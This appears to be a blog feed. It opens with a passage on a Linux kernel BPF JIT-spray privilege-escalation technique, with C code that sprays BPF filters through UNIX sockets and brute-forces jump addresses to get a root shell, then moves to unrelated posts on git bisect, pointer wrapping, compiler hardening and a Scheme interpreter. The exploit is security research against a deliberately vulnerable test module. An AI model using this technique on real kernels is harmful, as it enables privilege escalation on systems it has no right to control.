href="http://www.lst.de/~okir/blackhats/node121.html">transmit</a> file descriptors<sup><a href="#bpf_spray_fn1" class="footnoteRef" id="bpf_spray_fnref1">1</a></sup>. An FD sitting in a UNIX socket buffer might have already been closed by the sender. But it could be read back out in the future, so the kernel has to maintain all data structures relating to the FD — including BPF programs!</p><p>So we can make as many BPF-filtered sockets as we want, as long as we send them into <em>other</em> sockets and close them as we go. There are limits on the number of FDs enqueued on a socket, as well as the depth<sup><a href="#bpf_spray_fn2" class="footnoteRef" id="bpf_spray_fnref2">2</a></sup> of sockets sent through sockets sent through etc. But we can easily hit our goal of 8000 filter programs using a tree structure.</p><pre class="sourceCode c"><code class="sourceCode c"><span class="ot">#define SOCKET_FANOUT 20</span><br /><span class="ot">#define SOCKET_DEPTH 3</span><br /><br /><span class="co">// Create a socket with our BPF program attached.</span><br /><span class="dt">int</span> create_filtered_socket() {<br /> <span class="dt">int</span> fd = socket(AF_INET, SOCK_DGRAM, <span class="dv">0</span>);<br /> setsockopt(fd, SOL_SOCKET, SO_ATTACH_FILTER, &amp;filt, <span class="kw">sizeof</span>(filt));<br /> <span class="kw">return</span> fd;<br />}<br /><br /><span class="co">// Send an fd through a UNIX socket.</span><br /><span class="dt">void</span> send_fd(<span class="dt">int</span> dest, <span class="dt">int</span> fd_to_send);<br /><br /><span class="co">// Create a whole bunch of filtered sockets.</span><br /><span class="dt">void</span> create_socket_tree(<span class="dt">int</span> parent, size_t depth) {<br /> <span class="dt">int</span> fds[<span class="dv">2</span>];<br /> size_t i;<br /> <span class="kw">for</span> (i=<span class="dv">0</span>; i&lt;SOCKET_FANOUT; i++) {<br /> <span class="kw">if</span> (depth == (SOCKET_DEPTH - <span class="dv">1</span>)) {<br /> <span class="co">// Leaf of the tree.</span><br /> <span class="co">// Create a filtered socket and send it to &#39;parent&#39;.</span><br /> fds[<span class="dv">0</span>] = create_filtered_socket();<br /> send_fd(parent, fds[<span class="dv">0</span>]);<br /> close(fds[<span class="dv">0</span>]);<br /> } <span class="kw">else</span> {<br /> <span class="co">// Interior node of the tree.</span><br /> <span class="co">// Send a subtree into a UNIX socket pair.</span><br /> socketpair(AF_UNIX, SOCK_DGRAM, <span class="dv">0</span>, fds);<br /> create_socket_tree(fds[<span class="dv">0</span>], depth<span class="dv">+1</span>);<br /><br /> <span class="co">// Send the pair to &#39;parent&#39; and close it.</span><br /> send_fd(parent, fds[<span class="dv">0</span>]);<br /> send_fd(parent, fds[<span class="dv">1</span>]);<br /> close(fds[<span class="dv">0</span>]);<br /> close(fds[<span class="dv">1</span>]);<br /> }<br /> }<br />}</code></pre><p>The <a href="http://www.kernel.org/doc/man-pages/online/pages/man3/cmsg.3.html">interface</a> for sending FDs through a UNIX socket is really, <em>really</em> ugly, so I didn't show that code here. You can check out the <a href="https://github.com/kmcallister/alameda/blob/master/alameda.c#L388">implementation of <code>send_fd</code></a> if you want to.</p><h1 id="the-exploit">The exploit</h1><p>Since this whole article is about a strategy for exploiting kernel bugs, we need some kernel bug to exploit. For demonstration purposes I'll load an obviously insecure <a href="https://github.com/kmcallister/alameda/blob/master/ko/jump.c">kernel module</a> which will jump to any address we write to <code>/proc/jump</code>.</p><p>We know that a JIT-produced code page is somewhere in the <a href="http://lxr.linux.no/linux+v3.6.5/Documentation/x86/x86_64/mm.txt">region</a> used for kernel modules. We want to land 3 bytes into this page, skipping an <span style="white-space: nowrap"><code>xor %eax, %eax</code></span> (<code>31 c0</code>) and the initial <code>b8</code> opcode.</p><pre class="sourceCode c"><code class="sourceCode c"><span class="ot">#define MODULE_START 0xffffffffa0000000UL</span><br /><span class="ot">#define MODULE_END 0xfffffffffff00000UL</span><br /><span class="ot">#define MODULE_PAGES ((MODULE_END - MODULE_START) / 0x1000)</span><br /><br /><span class="ot">#define PAYLOAD_OFFSET 3</span></code></pre><p>A bad guess will likely oops the kernel and kill the current process. So we <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/fork.2.html">fork</a> off child processes to do the guessing, and keep doing this as long as they're dying with <code>SIGKILL</code>.</p><pre class="sourceCode c"><code class="sourceCode c"><span class="dt">int</span> status, jump_fd, urandom;<br /><span class="dt">unsigned</span> <span class="dt">int</span> pgnum;<br /><span class="dt">uint64_t</span> payload_addr;<br /><br /><span class="co">// ...</span><br /><br />jump_fd = open(<span class="st">&quot;/proc/jump&quot;</span>, O_WRONLY);<br />urandom = open(<span class="st">&quot;/dev/urandom&quot;</span>, O_RDONLY);<br /><br /><span class="kw">do</span> {<br /> <span class="kw">if</span> (!fork()) {<br /> <span class="co">// Child process</span><br /> read(urandom, &amp;pgnum, <span class="kw">sizeof</span>(pgnum));<br /> pgnum %= MODULE_PAGES;<br /> payload_addr = MODULE_START + (<span class="bn">0x1000</span> * pgnum) + PAYLOAD_OFFSET;<br /><br /> write(jump_fd, &amp;payload_addr, <span class="kw">sizeof</span>(payload_addr));<br /> execl(<span class="st">&quot;/bin/sh&quot;</span>, <span class="st">&quot;sh&quot;</span>, NULL); <span class="co">// Root shell!</span><br /> } <span class="kw">else</span> {<br /> wait(&amp;status);<br /> }<br />} <span class="kw">while</span> (WIFSIGNALED(status) &amp;&amp; (WTERMSIG(status) == SIGKILL));</code></pre><p>The <code>fork</code>ed children get a copy the whole process's state, of course, but they don't actually need it. The BPF programs live in kernel memory, which is shared by all processes. So the program that sets up the payload could be totally unrelated to the one that guesses addresses.</p><h1 id="notes">Notes</h1><p>The full source is <a href="https://github.com/kmcallister/alameda">available on GitHub</a>. It includes some error handling and cleanup code that I elided above.</p><p>I'll admit that this is mostly a curiosity, for two reasons:</p><ul class="incremental"><li>SMEP is not widely deployed yet.</li><li>The BPF JIT is disabled by default, and distributions don't enable it.</li></ul><p>Unless Intel abandons SMEP in subsequent processors, it will be widespread within a few years. It's less clear that the BPF JIT will ever catch on as a default configuration. But I'll note in passing that Linux is now using BPF programs for <a href="http://outflux.net/teach-seccomp/">process sandboxing</a> as well.</p><p>The BPF JIT is enabled by writing <code>1</code> to <code>/proc/sys/net/core/bpf_jit_enable</code>. You can write <code>2</code> to enable a debug mode, which will print the compiled program and its address to the kernel log. This makes life unreasonably easy for my exploit, by removing the address guesswork.</p><p>I don't have a CPU with SMEP, but I did try a <a href="http://grsecurity.net/">grsecurity</a> / PaX hardened kernel. PaX's KERNEXEC feature implements<sup><a href="#fn3" class="footnoteRef" id="fnref3">3</a></sup> in software a policy very similar to SMEP. And indeed, the JIT spray exploit succeeds where a traditional jump-to-userspace fails. (grsecurity has other features that would mitigate this attack, like the ability to lock out users who oops the kernel.)</p><p>The ARM, SPARC, and 64-bit PowerPC architectures each have their own BPF JIT. But I don't think they can be used for JIT spraying, because these architectures have fixed-size, aligned instructions. Perhaps on an ARM kernel built for Thumb-2...</p><div class="footnotes"><hr /><ol><li id="bpf_spray_fn1"><p>Actually, <a href="http://pubs.opengroup.org/onlinepubs/009695399/basedefs/xbd_chap03.html#tag_03_253">file <em>descriptions</em></a>. The description is the kernel state pertaining to an open file. The descriptor is a small integer referring to a file description. When we send an FD into a UNIX socket, the descriptor number received on the other end might be different, but it will refer to the same description.<a href="#bpf_spray_fnref1">↩</a></p></li><li id="bpf_spray_fn2"><p>While testing this code, I got the error <code>ETOOMANYREFS</code>. This was easy to track down, as there's only <a href="http://lxr.linux.no/linux+v3.6.5/net/unix/af_unix.c#L1376">one place</a> in the entire kernel where it is used.<a href="#bpf_spray_fnref2">↩</a></p></li><li id="fn3"><p>On i386, KERNEXEC uses <a href="http://www.cs.cmu.edu/~410/doc/segments/segments.html">x86 segmentation</a>, with negligible performance impact. Unfortunately, AMD64's vestigial segmentation is not good enough, so there KERNEXEC relies on a <a href="http://gcc.gnu.org/wiki/plugins">GCC plugin</a> to instrument every computed control flow instruction in the kernel. Specifically, it <code>or</code>s the target address with <span style="white-space: nowrap;"><code>(1 &lt;&lt; 63)</code></span>. If the target was a userspace address, the new address will be <a href="http://en.wikipedia.org/wiki/X86-64#Canonical_form_addresses">non-canonical</a> and the processor will fault.<a href="#fnref3">↩</a></p></li></ol></div>http://mainisusuallyafunction.blogspot.com/2012/11/attacking-hardened-linux-systems-with.htmlnoreply@blogger.com (keegan)20tag:blogger.com,1999:blog-1563623855220143059.post-1095967032934274147Tue, 18 Sep 2012 14:45:00 +00002012-09-18T07:45:44.771-07:00codedebugginggitpythonTracking down unused variables with Pyflakes and git bisect<p>I was working on a Python project when I noticed a variable that was defined but never used. Does this indicate that some important code was accidentally deleted? Or was there just a minor oversight during refactoring?</p><p>To answer this question, I wanted to see the Git commit which removed the last use of this variable. This sounds like a job for <a href="http://www.kernel.org/pub/software/scm/git/docs/git-bisect.html"><code>git bisect</code></a>. And because <a href="http://pypi.python.org/pypi/pyflakes">Pyflakes</a> can detect unused variables, the whole process is completely automatic.</p><p>I made a guess that the <code>mystery_variable</code> became unused sometime within the past two weeks. Then I told Git to consider a commit &quot;good&quot; if Pyflakes's list of complaints does not mention <code>mystery_variable</code>.</p><pre><code><span class="Prompt">$</span> <span class="Entry">git bisect start master master@{'2 weeks ago'}</span><br />Already on 'master'<br />Bisecting: 150 revisions left to test after this (roughly 7 steps)<br />[066327622129dbe863f6e2fc4746ff9e869bd049] Synthesize gravity<br /><br /><span class="Prompt">$</span> <span class="Entry">git bisect run bash -c '! pyflakes foo.py | grep mystery_variable'</span><br />running bash -c ! pyflakes foo.py | grep mystery_variable<br />Bisecting: 75 revisions left to test after this (roughly 6 steps)<br />[d3a5665eff478cccfb86d994a8fc289446325fbf] Model object components<br />running bash -c ! pyflakes foo.py | grep mystery_variable<br />Bisecting: 37 revisions left to test after this (roughly 5 steps)<br />[6ddcfbf27a1a4548acf972a6b817e485743f6bd9] Time-compress simulator clock<br />...<br /><br />running bash -c ! pyflakes foo.py | grep mystery_variable<br />9c2b2f006207ae9f274f9182efeb3e009d18ed04 is the first bad commit<br />commit 9c2b2f006207ae9f274f9182efeb3e009d18ed04<br />Author: Ben Bitdiddle &lt;bitdiddle@example.com&gt;<br />Date: Fri Sep 14 01:38:31 2012 -0400<br /><br /> Reticulate splines<br /></code></pre><p>Now I can examine this commit and see what happened.</p>http://mainisusuallyafunction.blogspot.com/2012/09/tracking-down-unused-variables-with.htmlnoreply@blogger.com (keegan)1tag:blogger.com,1999:blog-1563623855220143059.post-6816904949799939840Mon, 10 Sep 2012 01:51:00 +00002012-09-09T18:51:05.757-07:00codeimadethistarallitaralli: Screen edge pointer wrapping for X<p>The maximum travel distance between points on a desktop is substantially reduced if the pointer is allowed to travel off a screen edge and reappear at the opposite edge. In other words, we change the topology of the desktop to be that of a torus. This is not a new idea: it's implemented in several <a href="http://fixunix.com/xwindows/91117-can-mouse-wrap-around-screen-edges-xfree86.html">window managers</a>, programs for <a href="http://www.addictivetips.com/windows-tips/wrap-mouse-pointer-around-the-screen-in-windows-with-edgeless-2/">Windows</a> and <a href="http://www.digicowsoftware.com/detail?_app=Wraparound">Mac OS X</a>, and is even the subject of a <a href="http://insitu.lri.fr/TorusDesktop/TorusDesktop">research paper</a>.</p><p>I wanted a standalone program to implement mouse pointer wrapping for X Windows on GNU/Linux. Previously I was using <a href="http://synergy-foss.org/">Synergy</a> for this task. Synergy is a very cool program, but it's not a good choice for pointer wrapping on a single machine.</p><ul class="incremental"><li><p><strong>Correctness</strong>: I have several monitors at different resolutions, which means my desktop isn't rectangular. Synergy didn't understand where the edge of each monitor is.</p></li><li><p><strong>Security</strong>: I don't need the exposure of 95,000 lines of code for this simple task. Even if there are no bugs in Synergy, I'm one configuration mistake away from running an unencrypted network keylogger.</p></li><li><p><strong>Energy efficiency</strong>: Synergy wakes up 40 times per second even when nothing is happening. This can have a significant impact on laptop battery life.</p></li></ul><p>So I wrote <a href="https://github.com/kmcallister/taralli"><code>taralli</code></a> as a simple replacement. It doesn't automatically understand non-rectangular desktops, but you can easily customize the pointer position mapping, to implement multi-monitor wrap-around or many other behaviors. (If someone would like to contribute the code to get multi-monitor information from <a href="http://en.wikipedia.org/wiki/Xinerama">Xinerama</a> or something, I would be happy to add that.)</p><p><code>taralli</code> is under 100 lines of C99. It has been tested on GNU/Linux and is likely portable to other X platforms. You can <a href="https://github.com/kmcallister/taralli">download it from GitHub</a>, which is also a great place to submit any bug reports or patches.</p>http://mainisusuallyafunction.blogspot.com/2012/09/taralli-screen-edge-pointer-wrapping.htmlnoreply@blogger.com (keegan)1tag:blogger.com,1999:blog-1563623855220143059.post-7224942617544900091Sun, 13 May 2012 16:59:00 +00002012-05-13T09:59:04.470-07:00autotoolsccodecxxmoshsecurityAutomatic binary hardening with Autoconf<p>How do you protect a C program against memory corruption exploits? We should try to write code with no bugs, but we also need protection against any bugs which may lurk. Put another way, I try not to crash my bike but I still wear a helmet.</p><p>Operating systems now support a variety of tricks to make life difficult for would-be attackers. But most of these hardening features need to be enabled at compile time. When I started contributing to <a href="http://mosh.mit.edu/">Mosh</a>, I made it a goal to build with full hardening on every platform, not just <a href="https://wiki.ubuntu.com/Security/Features">proactive</a> distributions like Ubuntu. This means detecting available hardening features at compile time.</p><p>Mosh uses Autotools, so this code is naturally part of the <a href="http://www.gnu.org/software/autoconf/">Autoconf</a> script. I know that Autotools has a bad reputation in some circles, and I'm not going to defend it here. But a huge number of existing projects use Autotools. They can benefit today from a drop-in hardening recipe.</p><p>I've published an <a href="https://github.com/kmcallister/autoharden">example project</a> which uses Autotools to detect and enable some binary hardening features. To the extent possible under law, I <a href="https://github.com/kmcallister/autoharden/blob/master/LICENSE">waive all copyright</a> and related or neighboring rights to the code I wrote for this project. (There are some third-party files in the <code>m4/</code> subdirectory; those are governed by the respective licenses which appear in each file.) I want this code to be widely useful, and I welcome any refinements you have.</p><p>This article explains how my auto-detection code works, with some detail about the hardening measures themselves. If you just want to add hardening to your project, you don't necessarily need to read the whole thing. At the end I talk a bit about the performance implications.</p><h1 id="how-it-works">How it works</h1><p>The basic idea is simple. We use <code>AX_CHECK_{COMPILE,LINK}_FLAG</code> from the <a href="http://www.gnu.org/software/autoconf-archive/">Autoconf Archive</a> to detect support for each feature. The syntax is</p><div style="padding-left: 20px"><code>AX_CHECK_COMPILE_FLAG</code>(<em>flag</em>, <em>action-if-supported</em>, <em>action-if-unsupported</em>, <em>extra-flags</em>) </div> <p>For <em>extra-flags</em> we generally pass <code>-Werror</code> so the compiler will fail on unrecognized flags. Since the project contains both C and C++ code, we check each flag once for the C compiler and once for the C++ compiler. Also, some flags depend on others, or have multiple alternative forms. This is reflected in the nesting structure of the <em>action-if-supported</em> and <em>action-if-unsupported</em> blocks. You can see the full story in <a href="https://github.com/kmcallister/autoharden/blob/master/configure.ac#L21"><code>configure.ac</code></a>.</p><p>We accumulate all the supported flags into <code>HARDEN_{C,LD}FLAGS</code> and substitute these into each <code>Makefile.am</code>. The hardening flags take effect even if the user overrides <code>CFLAGS</code> on the command line. To explicitly disable hardening, pass</p><pre><code>./configure --disable-hardening</code></pre><p>A useful command when testing is</p><pre><code>grep HARDEN config.log<br /><br /></code></pre><h1 id="complications">Complications</h1><p><a href="http://clang.llvm.org/">Clang</a> will not error out on unrecognized flags, even with <code>-Werror</code>. Instead it prints a message like</p><pre><code>clang: warning: argument unused during compilation: &#39;-foo&#39;</code></pre><p>and continues on blithely. I don't want these warnings to appear during the actual build, so I hacked around Clang's behavior. The script <a href="https://github.com/kmcallister/autoharden/blob/master/scripts/wrap-compiler-for-flag-check"><code>wrap-compiler-for-flag-check</code></a> runs a command and errors out if the command prints a line containing &quot;<code>warning: argument unused</code>&quot;. Then <code>configure</code> temporarily sets</p><pre class="sourceCode bash"><code class="sourceCode bash"><span class="ot">CC=</span><span class="st">&quot;</span><span class="ot">$srcdir</span><span class="st">/scripts/wrap-compiler-for-flag-check </span><span class="ot">$CC</span><span class="st">&quot;</span></code></pre><p>while performing the flag checks.</p><p>When I integrated hardening into Mosh, I discovered that Ubuntu's default hardening flags <a href="https://github.com/keithw/mosh/issues/203">conflict</a> with ours. For example we set <span style="white-space:nowrap;"><code>-Wstack-protector</code></span>, meaning &quot;warn about any unprotected functions&quot;, and they set <span style="white-space:nowrap;"><code>--param=ssp-buffer-size=4</code></span>, meaning &quot;don't protect functions with fewer than 4 bytes of buffers&quot;. Our stack-protector flags are strictly more aggressive, so I disabled Ubuntu's by adding these lines to <a href="https://github.com/keithw/mosh/blob/mosh-1.2/debian/rules#L12"><code>debian/rules</code></a>:</p><pre><code>export DEB_BUILD_MAINT_OPTIONS = hardening=-stackprotector<br />-include /usr/share/dpkg/buildflags.mk</code></pre><p>We did <a href="https://github.com/keithw/mosh/blob/dee09fb8fcaab9abcecb748be5b31088b9c2b987/fedora/mosh.spec#L32">something similar</a> for Fedora.</p><p>Yet another problem is that Debian distributes <a href="http://www.skarnet.org/software/skalibs/">skalibs</a> (a Mosh dependency) as a <a href="http://packages.debian.org/squeeze/skalibs-dev">static-only library</a>, built without <code>-fPIC</code>, which in turn prevents Mosh from using <code>-fPIC</code>. Mosh can build the relevant parts of skalibs <a href="https://github.com/keithw/mosh/tree/mosh-1.2/third/libstddjb">internally</a>, but Debian and Ubuntu don't want us doing that. The unfortunate solution is simply to <a href="https://github.com/keithw/mosh/commit/0eec0b60f0c5b3d94d5e382ea3d4aff35c879ed2">reimplement</a> the small amount of skalibs we were using on Linux.</p><h1 id="the-flags">The flags</h1><p>Here are the specific protections I enabled.</p><ul class="incremental"><li><p><a href="https://wiki.ubuntu.com/Security/Features#fortify-source"><code>-D_FORTIFY_SOURCE=2</code></a> enables some compile-time and run-time checks on memory and string manipulation. This requires <code>-O1</code> or higher. See also <a href="http://www.kernel.org/doc/man-pages/online/pages/man7/feature_test_macros.7.html"><code>man 7 feature_test_macros</code></a>.</p></li><li><p><a href="https://bugzilla.redhat.com/show_bug.cgi?id=491266"><code>-fno-strict-overflow</code></a> prevents GCC from optimizing away arithmetic overflow tests.</p></li><li><p><a href="https://wiki.ubuntu.com/Security/Features#stack-protector"><code>-fstack-protector-all</code></a> detects stack buffer overflows after they occur, using a <a href="http://en.wikipedia.org/wiki/Buffer_overflow_protection#Canaries">stack canary</a>. We also set <span style="white-space:nowrap;"><code>-Wstack-protector</code></span> (warn about unprotected functions) and <span style="white-space:nowrap;"><code>--param ssp-buffer-size=1</code></span> (protect regardless of buffer size). (Actually, the &quot;<code>-all</code>&quot; part of <span style="white-space:nowrap;"><code>-fstack-protector-all</code></span> might imply <span style="white-space:nowrap;"><code>ssp-buffer-size=1</code></span>.)</p></li><li><p>Attackers can use fragments of legitimate code already in memory to <a href="http://cseweb.ucsd.edu/~hovav/talks/blackhat08.html">stitch together</a> exploits. This is much harder if they don't know where any of that code is located. Shared libraries get <a href="http://en.wikipedia.org/wiki/Address_space_layout_randomization">random addresses</a> by default, but your program doesn't. Even an exploit against a shared library can take advantage of that. So we build a <a href="https://wiki.ubuntu.com/Security/Features#pie">position independent executable</a> (PIE), with the goal that <em>every</em> executable page has a randomized address.</p></li><li><p>Exploits can't overwrite read-only memory. Some areas could be marked as read-only except that the <a href="http://www.iecc.com/linker/linker10.html">dynamic loader</a> needs to perform relocations there. The GNU linker flag <span style="white-space:nowrap;"><code>-z relro</code></span> arranges to set them as read-only once the dynamic loader is done with them.</p><p>In particular, this can <a href="http://www.airs.com/blog/archives/189">protect</a> the <a href="http://www.technovelty.org/linux/pltgot.html">PLT and GOT</a>, which are classic targets for memory corruption. But PLT entries normally get resolved on demand, which means they're writable as the program runs. We set <span style="white-space:nowrap;"><code>-z now</code></span> to resolve PLT entries at startup so they get RELRO protection.</p></li></ul><p>In the example project I also enabled <code>-Wall -Wextra -Werror</code>. These aren't hardening flags and we don't need to detect support, but they're quite important for catching security problems. If you can't make your project <span style="white-space:nowrap;"><code>-Wall</code></span>-clean, you can at least add security-relevant checks such as <span style="white-space:nowrap;"><code>-Wformat-security</code></span>.</p><h1 id="demonstration">Demonstration</h1><p>On x86 Linux, we can check the hardening features using Tobias Klein's <a href="http://www.trapkit.de/tools/checksec.html">checksec.sh</a>. First, as a control, let's build with no hardening.</p><pre class="sourceCode"><code class="sourceCode"><span class="Prompt">$</span> <span class="Entry">./build.sh --disable-hardening</span><br />+ autoreconf -fi<br />+ ./configure --disable-hardening<br />...<br />+ make<br />...<br /><span class="Prompt">$</span> <span class="Entry">~/checksec.sh --file src/test</span><br /><span style="color:red">No RELRO</span> <span style="color:red">No canary found</span> <span style="color:green">NX enabled</span> <span style="color:red">No PIE</span><br /></code></pre> <p>The <a href="http://en.wikipedia.org/wiki/NX_bit">no-execute bit</a> (NX) is mainly a kernel and CPU feature. It does not require much compiler support, and is enabled by default these days. Now we'll try full hardening:</p><pre class="sourceCode"><code class="sourceCode"><span class="Prompt">$</span> <span class="Entry">./build.sh</span><br />+ autoreconf -fi<br />+ ./configure<br />...<br />checking whether C compiler accepts -fno-strict-overflow... yes<br />checking whether C++ compiler accepts -fno-strict-overflow... yes<br />checking whether C compiler accepts -D_FORTIFY_SOURCE=2... yes<br />checking whether C++ compiler accepts -D_FORTIFY_SOURCE=2... yes<br />checking whether C compiler accepts -fstack-protector-all... yes<br />checking whether C++ compiler accepts -fstack-protector-all... yes<br />checking whether the linker accepts -fstack-protector-all... yes<br />checking whether C compiler accepts -Wstack-protector... yes<br />checking whether C++ compiler accepts -Wstack-protector... yes<br />checking whether C compiler accepts --param ssp-buffer-size=1... yes<br />checking whether C++ compiler accepts --param ssp-buffer-size=1... yes<br />checking whether C compiler accepts -fPIE... yes<br />checking whether C++ compiler accepts -fPIE... yes<br />checking whether the linker accepts -fPIE -pie... yes<br />checking whether the linker accepts -Wl,-z,relro... yes<br />checking whether the linker accepts -Wl,-z,now... yes<br />...<br />+ make<br />...<br /><span class="Prompt">$</span> <span class="Entry">~/checksec.sh --file src/test</span><br /><span style="color:green">Full RELRO</span> <span style="color:green">Canary found</span> <span style="color:green">NX enabled</span> <span style="color:green">PIE enabled</span><br /></code></pre> <p>We can dig deeper on some of these. <code>objdump -d</code> shows that the unhardened executable puts <code>main</code> at a fixed address, say <code>0x4006e0</code>, while the position-independent executable specifies a small offset like <code>0x9e0</code>. We can also see the stack-canary checks:</p><pre><code>b80: sub $0x18,%rsp<br />b84: mov %fs:0x28,%rax<br />b8d: mov %rax,0x8(%rsp)<br /><br /> ... function body ...<br /><br />b94: mov 0x8(%rsp),%rax<br />b99: xor %fs:0x28,%rax<br />ba2: jne bb4 &lt;c_fun+0x34&gt;<br /><br /> ... normal epilogue ...<br /><br />bb4: callq 9c0 &lt;__stack_chk_fail@plt&gt;</code></pre><p>The function starts by copying a &quot;<a href="http://en.wikipedia.org/wiki/Animal_sentinels#Detection_of_toxic_gases">canary</a>&quot; value from <code>%fs:0x28</code> to the stack. On return, that value had better still be there; otherwise, an attacker has clobbered our stack frame.</p><p>The canary is chosen randomly by glibc at program start. The <code>%fs</code> <a href="http://en.wikipedia.org/wiki/X86_memory_segmentation">segment</a> has a random offset in linear memory, which makes it hard for an attacker to discover the canary through an information leak. This also puts it within thread-local storage, so glibc could use a different canary value for each thread (but I'm not sure if it does).</p><p>The hardening flags adapt to any other compiler options we specify. For example, let's try a static build:</p><pre class="sourceCode"><code class="sourceCode"><span class="Prompt">$</span> <span class="Entry">./build.sh LDFLAGS=-static</span><br />+ autoreconf -fi<br />+ ./configure LDFLAGS=-static<br />...<br />checking whether C compiler accepts -fPIE... yes<br />checking whether C++ compiler accepts -fPIE... yes<br />checking whether the linker accepts -fPIE -pie... no<br />...<br />+ make<br />...<br /><span class="Prompt">$</span> <span class="Entry">file src/test</span><br />src/test: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux),<br />statically linked, for GNU/Linux 2.6.26, not stripped<br /><span class="Prompt">$</span> <span class="Entry">~/checksec.sh --file src/test</span><br /><span style="color:goldenrod">Partial RELRO</span> <span style="color:green">Canary found</span> <span style="color:green">NX enabled</span> <span style="color:red">No PIE</span><br /></code></pre> <p>We can't have position independence with static linking. And <code>checksec.sh</code> thinks we aren't RELRO-protecting the PLT — but that's because we don't have one.</p><h1 id="performance">Performance</h1><p>So what's the catch? These protections can slow down your program significantly. I ran <a href="https://github.com/keithw/mosh/issues/79#issuecomment-4683789">a few benchmarks</a> for Mosh, on three test machines:</p><ul class="incremental"><li><p>A wimpy netbook: 1.6 GHz Atom N270, Ubuntu 12.04 <code>i386</code></p></li><li><p>A reasonable laptop: 2.1 GHz Core 2 Duo T8100, Debian sid <code>amd64</code></p></li><li><p>A beefy desktop: 3.0 GHz Phenom II X6 1075T, Debian sid <code>amd64</code></p></li></ul><p>In all three cases I built Mosh using GCC 4.6.3. Here's the relative slowdown, in percent.</p><table class="datatable"><tr><th>Protections </th><th>Netbook </th><th>Laptop </th><th>Desktop </th></th><tr><td>Everything </td><td>16.0 </td><td>4.4 </td><td>2.1 </td></tr><tr><td>All except PIE </td><td>4.7 </td><td>3.3 </td><td>2.2 </td></tr><tr><td>All except stack protector </td><td>11.0 </td><td>1.0 </td><td>1.1 </td></tr></table> <p>PIE really hurts on <code>i386</code> because data references <a href="http://eli.thegreenplace.net/2011/11/03/position-independent-code-pic-in-shared-libraries/">use an extra register</a>, and registers are scarce to begin with. It's much cheaper on <code>amd64</code> thanks to <a href="http://en.wikipedia.org/wiki/Addressing_mode#PC-relative">PC-relative addressing</a>.</p><p>There are other variables, of course. One Debian stable system with GCC 4.4 saw a 30% slowdown, with most of it coming from the stack protector. So this deserves further scrutiny, if your project is performance-critical. Mosh doesn't use very much CPU anyway, so I decided security is the dominant priority.</p>http://mainisusuallyafunction.blogspot.com/2012/05/automatic-binary-hardening-with.htmlnoreply@blogger.com (keegan)9tag:blogger.com,1999:blog-1563623855220143059.post-7599939586658847281Sat, 28 Apr 2012 07:09:00 +00002012-04-28T00:09:01.051-07:00codelambda-calculuslanguagesqoppaschemevau-calculusScheme without special forms: a metacircular adventure<p>A good programming language will have many libraries building on a small set of core features. Writing and distributing libraries is much easier than dealing with changes to a language implementation. Of course, the choice of core features affects the scope of things we can build as libraries. We want a very small core that still allows us to build anything.</p><p>The <a href="http://en.wikipedia.org/wiki/Lambda_calculus">lambda calculus</a> can implement any computable function, and encode <a href="http://en.wikipedia.org/wiki/Church_encoding">arbitrary data types</a>. Technically, it's all we need to instruct a computer. But programs also need to be written and understood by humans. We fleshy meatbags will soon get lost in a sea of unadorned lambdas. Our languages need to have more structure.</p><p>As an example, the <a href="http://schemers.org/">Scheme</a> programming language is explicitly based on the lambda calculus. But it adds syntactic <a href="http://www.gnu.org/software/mit-scheme/documentation/mit-scheme-ref/Special-Forms.html">special forms</a> for definitions, variable binding, conditionals, etc. Scheme also lets the programmer define new syntactic forms as <a href="http://community.schemewiki.org/?scheme-faq-macros">macros</a> translating to existing syntax. Indeed, <code>lambda</code> and the macro system are enough to implement <a href="http://en.wikipedia.org/wiki/Scheme_(programming_language)#Minimalism">some</a> of the standard special forms.</p><p>But we can do better. There's a simple abstraction which lets us define <code>lambda</code>, Lisp or Scheme macros, and all the other special forms as mere library code. This idea was known as &quot;<a href="http://en.wikipedia.org/wiki/Fexpr">fexprs</a>&quot; in old Lisps, and more recently as &quot;operatives&quot; in <a href="http://fexpr.blogspot.com/">John Shutt</a>'s programming language <a href="http://web.cs.wpi.edu/~jshutt/kernel.html">Kernel</a>. Shutt's <a href="http://www.wpi.edu/Pubs/ETD/Available/etd-090110-124904/unrestricted/jshutt.pdf">PhD thesis</a> [PDF] has been a vital resource for learning about this stuff; I'm slowly making my way through its 416 pages.</p><p>What I understand so far can be summarized by something self-contained and kind of cool. Here's the agenda:</p><ul class="incremental"><li><p>I'll describe a tiny programming language named Qoppa. Its S-expression syntax and basic data types are borrowed from Scheme. Qoppa has no special forms, and a small set of built-in operatives.</p></li><li><p>We'll write a Qoppa interpreter in Scheme.</p></li><li><p>We'll write a library for Qoppa which implements enough Scheme features to run the Qoppa interpreter.</p></li><li><p>We'll use this nested interpreter to very slowly compute the factorial of 5.</p></li></ul><p>All of the code is <a href="https://github.com/kmcallister/qoppa">on GitHub</a>, if you'd like to see it in one place.</p><h1 id="operatives-in-qoppa">Operatives in Qoppa</h1><p>An operative is a first-class value: it can be passed to and from functions, stored in data structures, and so forth. To use an operative, you apply it to some arguments, much like a function. The difference is that</p><ol class="incremental" style="list-style-type: lower-alpha"><li><p>The operative receives its arguments as unevaluated syntax trees, and</p></li><li><p>The operative also gets an argument representing the variable-binding environment at the call site.</p></li></ol><p>Just as Scheme's functions are constructed by the <code>lambda</code> syntax, Qoppa's operatives are constructed by <code>vau</code>. Here's a simple example:</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define quote<br /> (<span class="kw">vau</span> (x) env<br /> x))</code></pre><p>We bind a single argument as <code>x</code>, and bind the caller's environment as <code>env</code>. (Since we don't use <code>env</code>, we could replace it with <code>_</code>, which means to ignore the argument in that position, like Haskell's <code>_</code> or Kernel's <code>#ignore</code>.) The body of the <code>vau</code> says to return the argument <code>x</code>, unevaluated.</p><p>So this implements Scheme's <code>quote</code> special form. If we evaluate the expression <code>(quote x)</code> we'll get the symbol <code>x</code>. As it happens, <code>quote</code> is used sparingly in Qoppa. There is usually a cleaner alternative, as we'll see.</p><p>Here's another operative:</p><pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define list (<span class="kw">vau</span> xs env<br /> (if (<span class="kw">null?</span> xs)<br /> (quote ())<br /> (<span class="kw">cons</span><br /> (<span class="kw">eval</span> env (<span class="kw">car</span> xs))<br /> (<span class="kw">eval</span> env (<span class="kw">cons</span> list (<span class="kw">cdr</span> xs)))))))</code></pre><p>This <code>list</code> operative does the same thing as Scheme's <code>list</code> function: it evaluates any number of arguments and returns them in a list. So <code>(list (+ 2 2) 3)</code> evaluates to the list <code>(4 3)</code>.</p><p>In Scheme, <code>list</code> is just 